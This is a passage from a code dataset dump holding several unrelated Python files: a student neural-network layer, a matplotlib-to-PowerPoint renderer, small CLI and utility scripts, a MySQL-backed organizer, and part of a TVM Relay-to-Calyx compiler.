corresponds to an example\n \n Returns: out\n out: (num_examples, num_outputs) Computed output activations\n \"\"\"\n # Some useful variables\n num_examples = X.shape[0]\n \n # Initialze self.out, self is needed beacuse it is used by backward\n self.out = np.zeros((num_examples, self.num_outputs))\n self.input = X # Will be used during backpropagation\n \n ########################### YOUR CODE HERE #############################\n \n # Copy your implementation from ans2a here\n \n # Compute the pre-activation outputs pre_acts \n pre_acts = np.add(np.matmul(self.input,self.W),self.b)\n \n # Apply activations to pre_acts using self.act(pre_acts) \n self.out = self.act(pre_acts)\n # raise NotImplementedError\n ########################################################################\n \n return self.out\n\n\n def backward(self, delta_out):\n \"\"\"\n backward(Linear, ndarray) -> ndarray\n Computes the gradient of the weights associated with this layer.\n Returns the error associated with input.\n\n delta_out: (num_examples, num_output) Error associated with the output units\n\n Returns: delta_in\n delta_in: (num_examples, num_inputs) Errors associated with the input\n units\n \"\"\"\n # Some useful variables\n num_examples = delta_out.shape[0]\n \n # Initialize the variables\n self.W_grad = np.zeros(self.W.shape)\n self.b_grad = np.zeros(self.b.shape)\n # print(self.b.shape)\n delta_in = np.zeros((num_examples, self.num_inputs))\n\n ########################### YOUR CODE HERE #############################\n \n # Compute self.W_grad, self.b_grad and delta_in\n\n # raise NotImplementedError\n Z = self.input\n delta_in = np.matmul(delta_out, self.W.T)*sigmoid_grad(Z)\n self.W_grad = np.matmul(self.input.T, delta_out)/num_examples\n self.b_grad = np.sum(delta_out,axis = 0)/num_examples\n # self.b_grad = delta_out\n self.b_grad = 
np.expand_dims(self.b_grad, axis=0)\n \n ########################################################################\n \n return delta_in\n\n\n def step(self, learning_rate=1e-2):\n \"\"\"\n step(Linear, float) -> None\n\n Updates the weights of this layer using gradients computed by the\n backward funciton by applying a single step of gradient descent\n\n learning_rate: The learning rate used for gradient descent\n \"\"\"\n ########################### YOUR CODE HERE #############################\n \n # Update self.W and self.b based on self.W_grad and self.b_grad\n self.W = self.W - learning_rate*self.W_grad\n self.b = self.b - learning_rate*self.b_grad\n \n # raise NotImplementedError\n \n ########################################################################\n \n\n","repo_name":"sruthigorantla/MachineLearning_A2","sub_path":"Q2/ans2b.py","file_name":"ans2b.py","file_ext":"py","file_size_in_byte":6436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12414905120","text":"\"\"\"Renderer\n\nReference\n---------\n* https://matplotlib.org/3.1.1/api/backend_bases_api.html\n\"\"\"\n\nfrom matplotlib.backend_bases import RendererBase\nimport matplotlib.path as mpath\nimport numpy as np\nfrom PIL import Image\n\nimport warnings\n\nfrom figpptx import constants\nfrom figpptx import pptx_misc\n\n\ndef to_color_infos(rgb):\n if len(rgb) == 4:\n alpha = rgb[3]\n rgb = rgb[:3]\n elif len(rgb) == 3:\n alpha = 1\n assert len(rgb) == 3\n rgb = tuple(map(lambda x: int(round(x * 255)), rgb))\n rgb_int = sum(rgb[index] << (8 * index) for index in range(3))\n return rgb_int, alpha\n\n\nclass CrudeRenderer(RendererBase):\n \"\"\"Last resolution for rendering of Artist.\n\n Args:\n slide_editor\n slide: Slide object.\n size: 2-length (width, height)\n\n \"\"\"\n\n def __init__(self, slide_editor):\n super().__init__()\n self.slide_editor = slide_editor\n self.slide = self.slide_editor.slide\n self._made_shapes = list()\n\n @property\n def made_shapes(self):\n \"\"\"Return the generated shapes.\"\"\"\n return self._made_shapes\n\n @property\n def height(self):\n return self.slide_editor.height\n\n @property\n def width(self):\n return self.slide_editor.width\n\n def draw_path(self, gc, path, transform, rgbFace=None):\n slide = self.slide\n msoEditingAuto = constants.msoEditingAuto\n msoSegmentLine = constants.msoSegmentLine\n msoSegmentCurve = constants.msoSegmentCurve\n msoEditingCorner = constants.msoEditingCorner\n form = None\n sx, sy = None, None\n array = None\n shapes = list()\n arrays = list()\n\n for index, (vertex, code) in enumerate(path.iter_segments(transform=transform)):\n # print(\"code\", code, \"vertex\", vertex)\n vertex = self.slide_editor.transform(vertex)\n if (not form) and code == mpath.Path.MOVETO:\n x, y = vertex\n form = slide.Shapes.BuildFreeform(msoEditingAuto, x, y)\n array = [(x, y)]\n sx, sy = x, y\n elif form and code == mpath.Path.MOVETO:\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n\n x, y = vertex\n form = slide.Shapes.BuildFreeform(msoEditingAuto, x, y)\n array = [(x, y)]\n sx, sy = x, y\n\n elif code == mpath.Path.CLOSEPOLY:\n \"\"\"You must not use vertex when code is 79.\"\"\"\n x, y = vertex\n form.AddNodes(msoSegmentLine, msoEditingAuto, sx, sy)\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n form, sx, sy = None, None, None\n elif code == mpath.Path.STOP:\n assert False, \"Not expected.\"\n shape = 
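Per its docstring, `sigmoid_grad` in the ans2b record receives `Z = sigmoid(X)` and should therefore return `Z * (1 - Z)`; the implementation above applies sigmoid a second time. The corrected gradient, with a quick central-difference check:

```python
import numpy as np

def sigmoid(X):
    return 1.0 / (1.0 + np.exp(-X))

def sigmoid_grad(Z):
    return Z * (1.0 - Z)            # Z is already the sigmoid output

X = np.linspace(-3, 3, 7)
h = 1e-6
numeric = (sigmoid(X + h) - sigmoid(X - h)) / (2 * h)
analytic = sigmoid_grad(sigmoid(X))
assert np.allclose(numeric, analytic, atol=1e-6)
```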
form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n array = None\n form, sx, sy = None, None, None\n elif code == mpath.Path.LINETO:\n assert len(vertex) == 2\n x, y = vertex\n form.AddNodes(msoSegmentLine, msoEditingAuto, x, y)\n array.append((x, y))\n elif code == mpath.Path.CURVE3:\n x, y, x1, y1 = vertex\n form.AddNodes(msoSegmentCurve, msoEditingCorner, x, y, x1, y1)\n array.append((x, y))\n elif code == mpath.Path.CURVE4:\n x, y, x1, y1, x2, y2 = vertex\n form.AddNodes(msoSegmentCurve, msoEditingCorner, x, y, x1, y1, x2, y2)\n array.append((x, y))\n else:\n raise ValueError(\"...\", \"code\", code)\n if form is not None:\n shape = form.ConvertToShape()\n shapes.append(shape)\n arrays.append(array)\n form, sx, sy = None, None, None\n array = None\n\n assert len(shapes) == len(arrays)\n for shape, array in zip(shapes, arrays):\n if rgbFace is None or len(array) <= 2:\n shape.Fill.Visible = False\n else:\n int_rgb, alpha = to_color_infos(rgbFace)\n shape.Fill.ForeColor.RGB = int_rgb\n shape.Fill.Transparency = 1 - alpha\n shape.Fill.Visible = constants.msoTrue\n\n line_weight = gc.get_linewidth()\n shape.Line.Weight = line_weight\n if not line_weight:\n shape.Line.Visible = constants.msoFalse\n else:\n shape.Line.Visible = constants.msoTrue\n int_rgb, alpha = to_color_infos(gc.get_rgb())\n shape.Line.ForeColor.RGB = int_rgb\n shape.Line.Transparency = 1 - alpha\n\n\n # make a Group.\n if 1 < len(shapes):\n for index, shape in enumerate(shapes):\n if index == 0:\n shape.Select(True)\n shape.Select(False)\n shape = self.slide.Application.ActiveWindow.Selection.ShapeRange.Group()\n\n self._made_shapes.append(shape)\n\n def draw_image(self, gc, x, y, im, transform=None):\n image = Image.fromarray(im[::-1, ...])\n slide = self.slide_editor.slide\n width, height = self.slide_editor.size\n x, y = self.slide_editor.transform([x, y])\n x, y = x, y - image.height\n shape = pptx_misc.paste_image(slide, image, left=x, top=y)\n self._made_shapes.append(shape)\n\n def draw_gouraud_triangle(self, gc, points, colors, transform):\n \"\"\"\n Tries to draw Gourand Triangle, however cannot...\n\n Note\n ----\n (2020-01-23) I feel it is impossible to\n gourand - triangles.\n Hence, instread of using gradation,\n the average color is used as a substitute.\n \"\"\"\n\n warnings.warn(\n \"Draw of ``Gourand Triangle`` does not work correctly.\", UserWarning\n )\n\n def _make_triangle(slide, points):\n sx, sy = points[0]\n form = slide.Shapes.BuildFreeform(constants.msoEditingAuto, sx, sy)\n x, y = points[1]\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, x, y)\n x, y = points[2]\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, x, y)\n form.AddNodes(constants.msoSegmentLine, constants.msoEditingAuto, sx, sy)\n shape = form.ConvertToShape()\n return shape\n\n points = transform.transform(points)\n points = np.array(self.slide_editor.transform(points))\n color = np.mean(colors, axis=0)\n int_rgb, alpha = to_color_infos(color)\n\n slide = self.slide_editor.slide\n shape = _make_triangle(slide, points)\n shape.Fill.ForeColor.RGB = int_rgb\n shape.Fill.Transparency = 1 - alpha\n shape.Fill.Visible = constants.msoTrue\n shape.Line.Visible = constants.msoFalse\n\n self._made_shapes.append(shape)\n\n def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None):\n # I do not understand why ``y`` is minus...\n y = -y + prop.get_size()\n x, y = self.slide_editor.transform((x, y))\n # msoTrue = -1\n msoFalse = 0\n ppAutoSizeShapeToFitText = 1\n 
msoTextOrientationHorizontal = 1\n arg_dict = {\n \"Left\": x,\n \"Top\": y,\n \"Width\": 100,\n \"Height\": 100,\n \"Orientation\": msoTextOrientationHorizontal,\n }\n shape = self.slide.Shapes.AddTextbox(**arg_dict)\n shape.TextFrame.TextRange.Text = s\n shape.TextFrame.AutoSize = ppAutoSizeShapeToFitText\n shape.TextFrame.TextRange.Font.Size = prop.get_size()\n shape.TextFrame.MarginLeft = 0\n shape.TextFrame.MarginRight = 0\n shape.TextFrame.MarginTop = 0\n shape.TextFrame.MarginBottom = 0\n shape.TextFrame.WordWrap = msoFalse\n\n # Itatic\n style = prop.get_style()\n if style in {\"italic\", \"oblique\"}:\n shape.TextFrame.Textrange.Font.Italic = True\n\n # Color\n rgb = gc.get_rgb()\n # Is there a place to set ``alpha``?\n rgb_int, alpha = to_color_infos(rgb)\n shape.TextFrame.TextRange.Font.Color.RGB = rgb_int\n shape.Fill.Visible = False\n\n # Rotation.\n pivot = (shape.Left, shape.Top + shape.Height)\n _rotate_offset(shape, angle, pivot)\n\n self._made_shapes.append(shape)\n\n\ndef _rotate_offset(shape, angle, pivot):\n \"\"\"\n Rotate ``shape`` `angle` degrees\n clockwise along ``pivot.\n\n Args:\n angle:\n degree.\n pivot:\n (`x`, `y`), pivot of the rotation.\n \"\"\"\n if angle == 0:\n return\n cx = shape.Left + shape.Width / 2\n cy = shape.Top + shape.Height / 2\n\n theta = -angle / 180 * np.pi # Sign of angle.\n\n # Rotation matrix.\n rotmat = np.array(\n [[np.cos(theta), -np.sin(theta)], [+np.sin(theta), np.cos(theta)]]\n )\n px, py = pivot\n # Pivot's position after Rotation.\n tx, ty = rotmat @ np.array([px - cx, py - cy]) + np.array([cx, cy])\n # Pivot is equal in before and after.\n shape.Left += px - tx\n shape.Top += py - ty\n shape.Rotation = -angle # Sign of angle.\n\n \"\"\" # A candidate of code.\n However, it is a little diffuclt.\n rotmat = np.array([[1 - np.cos(theta), + np.sin(theta) ],\n [- np.sin(theta), 1 - np.cos(theta)]])\n px, py = pivot\n tx, ty = rotmat @ np.array([px - cx, py - cy])\n shape.Left += tx\n shape.Top += ty\n shape.Rotation = - angle # Definition of Rotation.\n \"\"\"\n\n\nclass DummyRenderer(RendererBase):\n \"\"\"Dummy Renderer.\n This class is used for calling of the ``Figure/Axes`` draw\n so that adjustement functions are called according to settings.\n\n Ref:\n * https://matplotlib.org/3.1.1/api/backend_bases_api.html?highlight=renderer%20draw_path_collection#matplotlib.backend_bases.RendererBase # NOQA\n \"\"\"\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n super().__init__()\n\n def draw_path(self, gc, path, transform, rgbFace=None):\n pass\n\n def draw_image(self, gc, x, y, im, transform=None):\n pass\n\n def draw_gouraud_triangle(self, gc, points, colors, transform):\n pass\n\n def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None):\n pass\n\n def draw_markers(self, gc, marker_path, marker_trans, path, trans, rgbFace=None):\n pass\n\n def draw_path_collection(\n self,\n gc,\n master_transform,\n paths,\n all_transforms,\n offsets,\n offsetTrans,\n facecolors,\n edgecolors,\n linewidths,\n linestyles,\n antialiaseds,\n urls,\n offset_position,\n ):\n pass\n\n def draw_quad_mesh(\n self,\n gc,\n master_transform,\n meshWidth,\n meshHeight,\n coordinates,\n offsets,\n offsetTrans,\n facecolors,\n antialiased,\n edgecolors,\n ):\n pass\n","repo_name":"Sillte/figpptx","sub_path":"figpptx/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
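`_rotate_offset` in the figpptx record keeps a chosen pivot fixed by rotating it about the shape's center and translating the shape by the difference. The same algebra as a standalone helper, using the record's sign convention and returning the Left/Top offset the method applies:

```python
import numpy as np

def rotate_about_pivot(center, pivot, angle_deg):
    theta = -angle_deg / 180 * np.pi          # same sign convention as above
    rot = np.array([[np.cos(theta), -np.sin(theta)],
                    [np.sin(theta),  np.cos(theta)]])
    px, py = pivot
    cx, cy = center
    # Where the pivot lands when the shape spins about its own center:
    tx, ty = rot @ np.array([px - cx, py - cy]) + np.array([cx, cy])
    return px - tx, py - ty                   # shift that restores the pivot

print(rotate_about_pivot((10, 10), (0, 0), 90))   # offset approx (0.0, -20.0)
```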
+{"seq_id":"26574341510","text":"import main\nfrom person import Person\nimport inquirer\nfrom time import sleep\nlist = []\nlist_options = ['Add a new person','Show database', 'Edit database', 'Quit']\n\nwhile True:\n main.inishow()\n questions = [\n inquirer.List('opt',\n message='What do you want me to do?',\n choices=list_options,\n ),\n ]\n answ = inquirer.prompt(questions)\n sel = answ['opt']\n if sel == list_options[0]:\n main.add(list)\n elif sel == list_options[1]:\n if list == []:\n main.datashow()\n print(\"\\033[1;31mERROR! There's no database to be shown\\033[m\")\n print('\\033[1;31mGoing back to the MENU!\\033[m')\n else: \n main.datashow()\n main.show(list)\n elif sel == list_options[2]:\n if list == []:\n main.editshow()\n print(\"\\033[1;31mERROR! There's no database to be edited\\033[m\")\n print('\\033[1;31mGoing back to the MENU!\\033[m')\n else:\n main.editshow()\n main.edit(list)\n \n elif sel == list_options[3]:\n main.quitshow()\n print('\\033[1;31mQUITTING...\\033[m')\n break \n sleep(1) \n\n\n\n\n\n","repo_name":"gabrielkunst/python","sub_path":"proj/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36045478954","text":"import datetime\n\n\ndef datetime_input(date_time):\n year = str(date_time.year)\n month = (date_time.month)\n day = (date_time.day)\n century(year, month, day)\n\n\ndef century(year, month, day):\n\n # year = input('date année?')\n # month = input('date mois?')\n # day = input('date jours?')\n # date = datetime.date(int(year), int(month), int(day))\n # print(date)\n # if not date:\n # print(\"Bye\")\n\n # else:\n if int(year) < 101:\n if int(year) < 1:\n return '0'\n else:\n return 'Premier'\n if len(year) < 4:\n unite_siecle = year[:1]\n test_siecle = int(unite_siecle)*100\n print('test_siecle ', test_siecle)\n if int(test_siecle) == int(year):\n return {unite_siecle}\n else:\n siecle = int(unite_siecle)\n siecle += 1\n return {siecle}\n if len(year) < 5:\n unite_siecle = year[:2]\n test_siecle = int(unite_siecle)*100\n print('test_siecle ', test_siecle)\n\n if int(test_siecle) == int(year):\n return {unite_siecle}\n else:\n siecle = int(unite_siecle)\n siecle += 1\n return {siecle}\n return 'pas de date ?'\n\n\ndef validate_year(date):\n ''' fonction validation de l'année '''\n y = date.year\n\n\n# if __name__ == '__main__':\n# datetime_input(datetime.date(1953, 5, 1))\n# cent = century()\n# print(cent, ' siècle')\n","repo_name":"thycan22/babel-thycan22","sub_path":"catalog/century.py","file_name":"century.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38650448122","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\n\nCHAR_PIX_LIST = ['M', '&', 'D', 'n', '1', '+', ',', ' ']\nGAP = 256 / len(CHAR_PIX_LIST)\n\n\nclass Img2txt:\n def __init__(self, src, resize=0.7):\n self.src = src\n img = Image.open(src)\n if img.mode == 'P' or img.mode == 'RGBA':\n im = Image.new('RGB', img.size, 'white')\n im.paste(img.convert('RGBA'), img.convert('RGBA'))\n img = im\n img = img.convert('L')\n self.w = int(img.size[0] * resize)\n self.h = int(img.size[1] / 2.0 * resize) # 由于显示的字符不是等高宽的(高比宽长),这里将图片高度缩小来调整。\n img = img.resize((self.w, self.h), Image.ANTIALIAS)\n self.pixes = img.load()\n\n def img2txt(self):\n with file(self.src + '.txt', 'w') as txt:\n for y in range(self.h):\n def get_char_pix():\n for x in 
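`century()` in the record above works by slicing year strings and returns one-element sets such as `{siecle}` rather than numbers. The arithmetic it encodes (year 2000 still counts as the 20th century) reduces to a ceiling division:

```python
def century_of(year: int) -> int:
    """1-100 -> 1, 101-200 -> 2, ..., 1953 -> 20, 2000 -> 20."""
    return (year + 99) // 100

assert century_of(100) == 1
assert century_of(1953) == 20
assert century_of(2000) == 20
```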
range(self.w):\n pix = self.pixes[x, y]\n for index, c in enumerate(CHAR_PIX_LIST, 1):\n if pix < index * GAP:\n yield c\n break\n\n line = ''.join(get_char_pix())\n txt.write(line + '\\n')\n\n\n\nif '__main__' == __name__:\n img2txt = Img2txt('img.jpg')\n img2txt.img2txt()\n","repo_name":"EndlessCheng/my-python-scripts","sub_path":"img2txt.py","file_name":"img2txt.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11767486681","text":"import mysql.connector\nfrom mysql.connector import errorcode\n\n\nclass MySQLdb(object):\n db_root_user = 'root'\n db_root_pass = '****'\n db_host = 'localhost'\n cnx = mysql.connector.connect(host=db_host, user=db_root_user, password=db_root_pass)\n cursor = cnx.cursor()\n\n def connect_to_db(self, db_name):\n try:\n print(f'Connecting to database: ', end='')\n self.cursor.execute(f'USE {db_name}_organizer;')\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n print(f'DB {db_name}_organizer does not exist')\n try:\n print(f'Creating database {db_name}_organizer: ', end='')\n self.cursor.execute(f'CREATE DATABASE {db_name}_organizer;')\n self.cursor.execute(f'USE {db_name}_organizer;')\n except mysql.connector.Error as err:\n print(f'failed creating database, {err}')\n exit(1)\n else:\n print('created and connected')\n else:\n print('done')\n\n def create_tables(self):\n tables = {}\n\n tables['note'] = 'CREATE TABLE note(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'title nvarchar(100) not null,' \\\n 'content nvarchar(8000) not null' \\\n ');'\n\n tables['business_card'] = 'CREATE TABLE business_card(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'name varchar(45),' \\\n 'surname nvarchar(45),' \\\n 'mobile char(9) not null' \\\n ');'\n\n tables['discount_code'] = 'CREATE TABLE discount_code(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'shop varchar(45) not null,' \\\n 'discount varchar(11) not null,' \\\n 'code varchar(30) not null' \\\n ');'\n\n for table in tables:\n table_desc = tables[table]\n try:\n print(f'Creating table {table}: ', end='')\n self.cursor.execute(table_desc)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists')\n else:\n print(err.msg)\n else:\n print('done')\n print('')\n\n def insert_note_into_db(self, new_note):\n insert_query = 'INSERT INTO note (date, priority, title, content) ' \\\n 'VALUES (%(date)s, %(priority)s, %(title)s, %(content)s);'\n self.cursor.execute(insert_query, new_note)\n self.cnx.commit()\n\n def extract_note_from_db(self):\n select_query = 'SELECT * FROM note;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_note_from_db(self, to_be_deleted):\n delete_query = 'DELETE FROM note WHERE id = %s;'\n self.cursor.execute(delete_query, to_be_deleted)\n self.cnx.commit()\n\n\n def inser_business_card_into_db(self, data):\n insert_query = 'INSERT INTO business_card (date, priority, name, surname, mobile) ' \\\n 'VALUES (%s, %s, %s, %s, %s);'\n self.cursor.execute(insert_query, data)\n self.cnx.commit()\n\n def extract_business_card_from_db(self):\n select_query = 'SELECT * FROM business_card;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_business_card_from_db(self, id):\n delete_query = 'DELETE 
FROM business_card WHERE id = %s;'\n self.cursor.execute(delete_query, id)\n self.cnx.commit()\n\n\n def insert_discount_code_into_db(self, data):\n insert_query = 'INSERT INTO discount_code (date, priority, shop, discount, code) ' \\\n 'VALUES (%s, %s, %s, %s, %s);'\n self.cursor.execute(insert_query, data)\n self.cnx.commit()\n\n def extract_discount_code_from_db(self):\n select_query = 'SELECT * FROM discount_code;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_discount_code_from_db(self, id):\n delete_query = 'DELETE FROM discount_code WHERE id = %s;'\n self.cursor.execute(delete_query, id)","repo_name":"ziepio/organizer","sub_path":"db_mysql.py","file_name":"db_mysql.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18130073647","text":"#!/usr/bin/env python3\n# type: ignore\nfrom typing import Tuple\n\nimport numpy as np\nimport tvm\nfrom tvm import relay\nfrom tvm.relay.expr_functor import ExprFunctor\nfrom tvm.relay.function import Function\n\n\nfrom collections import defaultdict\nfrom typing import List, Dict\n\nimport relay_utils as ru\nfrom calyx.py_ast import (\n Cell,\n CompVar,\n CompInst,\n Import,\n Program,\n SeqComp,\n Stdlib,\n Component,\n)\nfrom calyx.utils import float_to_fixed_point\nfrom fud.stages.verilator import numeric_types\nfrom dahlia_impl import emit_components\n\ncalyx_keywords_list = [\"input\"]\n\n\ndef rename_relay_var(name: str) -> str:\n \"\"\"\n Function to rename relay variable names (that are illegal in Calyx) into legal\n ones. This function is to ensure a consistent standard for renaming, since\n we want to make sure that the cell names in the external memory json match the\n name they are instantiated as in the Calyx file\n \"\"\"\n new_name = name.replace(\".\", \"_\")\n new_name = new_name.replace(\"/\", \"_\")\n\n if new_name.isdigit():\n new_name = \"var_\" + new_name\n if new_name in calyx_keywords_list:\n new_name = \"_\" + new_name\n\n return new_name\n\n\nclass Relay2Calyx(ExprFunctor):\n \"\"\"The main compilation visitor.\"\"\"\n\n def __init__(self):\n super(Relay2Calyx, self).__init__()\n self.id_dictionary = defaultdict(int)\n self.function_id_dictionary = defaultdict(int)\n\n # A dictionary of currently visited variable nodes,\n # since some nodes may be visited more than once.\n self.id_to_cell: Dict[str, Cell] = {}\n\n # A dictionary of variable names to dimensionality.\n # This is used for the data in Calyx simulation.\n self.id_to_shape: Dict[str, Tuple] = {}\n\n # maps the operator name / destination memory width to the\n # dahlia function. 
Used to detect when two dahlia functions are\n # the same so we don't declare it twice\n self.func_def_map = {}\n\n # For each Relay CallNode, there is an associated\n # Dahlia FuncDef so that it can be lowered from Dahlia\n # to Calyx as a stand-alone component.\n self.func_defs: List[ru.DahliaFuncDef] = []\n\n # Controls, wires of the main component.\n self.controls = []\n self.wires = []\n\n self.pos_count = 0\n\n self.source_map: Dict[str, str] = {}\n\n # for let stmts such as `let %x13: (_,_) = (%x9, %x12)`\n # if %x9 is equal to some memory mem9, and %x12 is equal to some memory mem12\n # this maps the var %x13 -> [mem9, mem12]\n self.tuple_dic = {}\n\n # for let stmts such as `let %x_10 = meta[relay.Constant][0]`,\n # which is a multidimensional value, we need a dic to remember such\n # statements so that we can put it in the data json file\n self.mem_data = {}\n\n def id(self, name):\n \"\"\"\n Provides a unique identification for a given name.\n If 'a' is seen twice, it will produce: 'a', 'a1'.\n No `_` is used, in accordance with Relay variable\n names.\n \"\"\"\n id_number = self.id_dictionary[name]\n self.id_dictionary[name] += 1\n return f\"{name}{'' if id_number == 0 else id_number}\"\n\n def func_id(self, function_name):\n \"\"\"Used to uniquely identify functions with the\n same name and arity. Eventually, we'll want to\n instantiate two instances of the same Calyx\n component. For example, if `foo_3x3` is seen twice,\n it will produce: `foo_3x3`, `foo_3x3_1`\"\"\"\n id_number = self.id_dictionary[function_name]\n self.id_dictionary[function_name] += 1\n return function_name if id_number == 0 else f\"{function_name}_{id_number}\"\n\n def visit_var(self, var) -> list:\n \"\"\"\n Visits a Relay variable and returns the\n corresponding Calyx memory/memories.\n \"\"\"\n if var in self.tuple_dic.keys():\n return self.tuple_dic[var]\n if isinstance(var.type_annotation, tvm.ir.type.TupleType):\n # returns a list of names instead\n assert 0, \"should have been added to tuple_dic when defined in a let stmt\"\n\n var_id = self.id(rename_relay_var(var.name_hint))\n cell = ru.get_memory(var_id, var.type_annotation)\n if var.type_annotation.concrete_shape:\n # Only add the given variable if it is a tensor.\n self.id_to_shape[var_id] = var.type_annotation.concrete_shape\n self.id_to_cell[var_id] = cell\n return [cell]\n\n def equivalent_func(self, args1, args2, atts1, atts2):\n \"\"\"\n Assuming functions 1 and 2 have equivalent destination widths (ex: 1x64x55x55) and\n operator name (ex: \"Conv2d\"), this function checks if the functions have\n equivalent args and attributes. 
This is mainly making sure the attributes (so for\n conv2d, things like `padding` or `kernel_size`) and memory sizes of the args\n are the same.\n \"\"\"\n atts_are_same = True\n if (atts1 is None) != (atts2 is None):\n atts_are_same = False\n if (atts1 is not None) and (atts2 is not None):\n for key in atts1.keys():\n attr1 = atts1.get_str(key)\n attr2 = atts2.get_str(key)\n # even if the contents of tvm.ir.container.Array are the same it\n # still doesn't return true on '=='\n if isinstance(attr1, tvm.ir.container.Array) and isinstance(\n attr2, tvm.ir.container.Array\n ):\n attr1 = list(attr1)\n attr2 = list(attr2)\n if not attr1 == attr2:\n atts_are_same = False\n args_are_same = True\n for arg1, arg2 in zip(args1, args2):\n if arg1.comp != arg2.comp:\n args_are_same = False\n return atts_are_same and args_are_same\n\n def analyze_val_dest(self, let, value, dest, type_annotation):\n \"\"\"\n Helper method that is used to handle certain cases for visiting\n let statements. Should only be called when value is a Constant or a Call\n \"\"\"\n if isinstance(value, tvm.relay.Constant):\n # In the updated version of TVM, sometimes there are assignments\n # in the form of `let %x_10 = meta[relay.Constant][0]`\n # We need to remember this data in a dictionary since Calyx\n # will get these values externally in a json file\n for dim_val in value.data.shape:\n if dim_val != 1:\n np_data = value.data.numpy()\n self.mem_data[dest.id.name] = np_data\n return\n\n # Generates a constant primitive.\n # This is done here since we need\n # both the variable id and the value.\n width = ru.get_bitwidth(value.data)\n\n if \"float\" in value.data.dtype:\n # Convert to fixed point.\n constant = float_to_fixed_point(value.data.numpy(), width // 2)\n val = numeric_types.FixedPoint(\n f\"{constant}\", width, width // 2, True\n ).unsigned_integer()\n else:\n val = value.data\n cell = Cell(CompVar(dest.id.name), Stdlib.constant(width, val))\n self.id_to_cell[dest.id.name] = cell\n elif isinstance(value, tvm.relay.Call):\n # Generates cells and control for a Relay Call:\n # 1. `Invoke` control\n # 2. Component declaration for the invoked component.\n # 3. `DahliaFuncDef` to generate the Relay call component.\n\n func_name = value.op.name\n # Function names may have a Relay\n # namespace prepended, e.g. 
`nn.bias_add`.\n # We want to remove these.\n prefix = func_name.find(\".\")\n if prefix is not None:\n func_name = func_name[prefix + 1 :]\n\n # Append arity to Calyx component name.\n dims = \"x\".join([str(i) for i in ru.get_dimension_sizes(dest.comp)])\n\n unnested_args = []\n for arg in value.args:\n new_arg = arg\n if isinstance(arg, list):\n assert (\n len(arg) == 1\n ), \"the only time arg can be a list is when it returns a list of length 1 from visit_var()\"\n new_arg = arg[0]\n unnested_args.append(new_arg)\n value.args = unnested_args\n\n root_name = f\"{func_name}_{dims}\"\n\n is_repeat_func = False\n\n # If we want to \"reuse\" a Dahlia function so that we're only generating\n # one Calyx component, when we create the invoke we have\n # to make sure that we use the old names for the parameters\n # (by old names, I mean the names that the previous component used\n # for its ref cell parameters)\n # all of this old_func_args and old_dest stuff will be useful when\n # considering which arguments should be passed into the DahliaFunc/Calyx Invoke\n # statement\n old_func_args = []\n old_dest = None\n if root_name in self.func_def_map:\n for dahlia_func in self.func_def_map[root_name]:\n if self.equivalent_func(\n dahlia_func.args,\n value.args,\n dahlia_func.attributes,\n value.attrs,\n ):\n # this means we can \"reuse\" the Dahlia Function which\n # will later be turned into a Calyx component, since\n # we have already created a Dahlia function identical\n # to the one we were about to create\n comp_name = f\"{dahlia_func.component_name}\"\n comp_inst = dahlia_func.component\n old_func_args = dahlia_func.args\n old_dest = dahlia_func.dest\n is_repeat_func = True\n break\n\n # Given functions with the same operator and arity,\n # append a unique identifier to the preceding. 
However, we only want\n # to create a new Dahlia Function (which will be lowered\n # to a Calyx component) if we haven't encountered the same function\n # before\n if not is_repeat_func:\n comp_name = self.func_id(f\"{func_name}_{dims}\")\n comp_inst = CompInst(comp_name, [])\n\n # call self.id on comp_name because now we might produce two instances\n # of the same component\n var_name = self.id(f\"{comp_name}_\")\n comp_decl = CompVar(f\"{var_name}\")\n\n self.id_to_cell[var_name] = Cell(comp_decl, comp_inst)\n\n # the parameters old_func_args and old_dest are what determine whether\n # ru.emit_invoke_control emits a \"new\" invoke or an invoke of an already defined\n # Calyx component/Dahlia function\n invoke = ru.emit_invoke_control(\n comp_decl, dest, value.args, old_args=old_func_args, old_dest=old_dest\n )\n invoke.attributes.append((\"pos\", self.pos_count))\n self.controls.append(invoke)\n\n tag = self.pos_count\n self.pos_count += 1\n\n self.source_map[tag] = [\n x for x in str(let).splitlines() if x.startswith(\"let\")\n ][0]\n\n # only add to Dahlia Functions list and map if we actually want to\n # use a new Dahlia Function, i.e., if we are not reusing the function\n if not is_repeat_func:\n dahlia_func_def = ru.DahliaFuncDef(\n function_id=func_name,\n component_name=comp_name,\n dest=dest,\n 